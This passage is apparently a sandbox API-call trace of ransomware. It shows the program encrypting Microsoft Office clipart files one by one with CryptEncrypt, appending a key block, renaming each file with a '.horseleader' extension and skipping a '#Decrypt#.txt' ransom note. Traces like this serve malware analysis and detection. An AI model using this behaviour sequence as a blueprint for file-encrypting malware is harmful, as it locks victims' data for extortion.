Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 67 [0252.980] StrStrW (lpFirst="AN04225_.WMF", lpSrch=".txt") returned 0x0 [0252.980] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8492) returned 1 [0252.981] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x212c, lpOverlapped=0x0) returned 1 [0252.983] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffded4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.983] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x212c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x212c, lpOverlapped=0x0) returned 1 [0252.983] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.983] CloseHandle (hObject=0x158) returned 1 [0252.984] GetProcessHeap () returned 0x780000 [0252.984] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.984] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.horseleader") returned 79 [0252.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.horseleader")) returned 1 [0252.985] GetProcessHeap () returned 0x780000 [0252.985] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.985] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04235_.WMF", cAlternateFileName="")) returned 1 [0252.985] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="Windows") returned -1 [0252.985] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 67 [0252.985] StrStrIW (lpFirst="AN04235_.WMF", lpSrch=".horseleader") returned 0x0 [0252.985] lstrcmpW (lpString1="AN04235_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.985] lstrcmpW (lpString1="AN04235_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.985] lstrlenW (lpString=".testttjffg") returned 11 [0252.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.986] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 67 [0252.986] StrStrW (lpFirst="AN04235_.WMF", lpSrch=".txt") returned 0x0 [0252.986] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7804) returned 1 [0252.986] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe184, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.989] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e7c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.990] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.990] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.990] CloseHandle (hObject=0x158) returned 1 [0252.990] GetProcessHeap () returned 0x780000 [0252.990] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.990] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.horseleader") returned 79 [0252.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.horseleader")) returned 1 [0252.991] GetProcessHeap () returned 0x780000 [0252.991] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.991] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04267_.WMF", cAlternateFileName="")) returned 1 [0252.992] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="Windows") returned -1 [0252.992] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0252.992] StrStrIW (lpFirst="AN04267_.WMF", lpSrch=".horseleader") returned 0x0 [0252.992] lstrcmpW (lpString1="AN04267_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.992] lstrcmpW (lpString1="AN04267_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.992] lstrlenW (lpString=".testttjffg") returned 11 [0252.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.993] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0252.993] StrStrW (lpFirst="AN04267_.WMF", lpSrch=".txt") returned 0x0 [0252.993] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7804) returned 1 [0252.993] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe184, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.995] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e7c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.996] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.996] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.996] CloseHandle (hObject=0x158) returned 1 [0252.996] GetProcessHeap () returned 0x780000 [0252.996] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.996] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.horseleader") returned 79 [0252.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.horseleader")) returned 1 [0252.997] GetProcessHeap () returned 0x780000 [0252.997] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.997] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04269_.WMF", cAlternateFileName="")) returned 1 [0252.998] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="Windows") returned -1 [0252.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 67 [0252.998] StrStrIW (lpFirst="AN04269_.WMF", lpSrch=".horseleader") returned 0x0 [0252.998] lstrcmpW (lpString1="AN04269_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.998] lstrcmpW (lpString1="AN04269_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.999] lstrlenW (lpString=".testttjffg") returned 11 [0252.999] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.999] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.999] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 67 [0252.999] StrStrW (lpFirst="AN04269_.WMF", lpSrch=".txt") returned 0x0 [0253.000] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2016) returned 1 [0253.000] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7e0, lpOverlapped=0x0) returned 1 [0253.001] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff820, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.002] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7e0, lpOverlapped=0x0) returned 1 [0253.002] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.002] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.002] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.002] CloseHandle (hObject=0x158) returned 1 [0253.002] GetProcessHeap () returned 0x780000 [0253.002] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.002] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.horseleader") returned 79 [0253.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.horseleader")) returned 1 [0253.003] GetProcessHeap () returned 0x780000 [0253.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.003] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9bc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04323_.WMF", cAlternateFileName="")) returned 1 [0253.003] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="Windows") returned -1 [0253.003] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 67 [0253.003] StrStrIW (lpFirst="AN04323_.WMF", lpSrch=".horseleader") returned 0x0 [0253.004] lstrcmpW (lpString1="AN04323_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.004] lstrcmpW (lpString1="AN04323_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.004] lstrlenW (lpString=".testttjffg") returned 11 [0253.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 67 [0253.005] StrStrW (lpFirst="AN04323_.WMF", lpSrch=".txt") returned 0x0 [0253.005] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2492) returned 1 [0253.005] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9bc, lpOverlapped=0x0) returned 1 [0253.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff644, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.008] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9bc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9bc, lpOverlapped=0x0) returned 1 [0253.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.009] CloseHandle (hObject=0x158) returned 1 [0253.009] GetProcessHeap () returned 0x780000 [0253.009] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.009] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.horseleader") returned 79 [0253.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.horseleader")) returned 1 [0253.010] GetProcessHeap () returned 0x780000 [0253.010] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.010] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd14, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04326_.WMF", cAlternateFileName="")) returned 1 [0253.010] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="Windows") returned -1 [0253.010] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 67 [0253.010] StrStrIW (lpFirst="AN04326_.WMF", lpSrch=".horseleader") returned 0x0 [0253.011] lstrcmpW (lpString1="AN04326_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.011] lstrcmpW (lpString1="AN04326_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.011] lstrlenW (lpString=".testttjffg") returned 11 [0253.011] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.011] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.011] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.011] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.012] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 67 [0253.012] StrStrW (lpFirst="AN04326_.WMF", lpSrch=".txt") returned 0x0 [0253.012] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3348) returned 1 [0253.012] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd14, lpOverlapped=0x0) returned 1 [0253.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.014] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd14, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd14, lpOverlapped=0x0) returned 1 [0253.015] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.015] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.015] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.015] CloseHandle (hObject=0x158) returned 1 [0253.015] GetProcessHeap () returned 0x780000 [0253.015] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.015] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.horseleader") returned 79 [0253.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 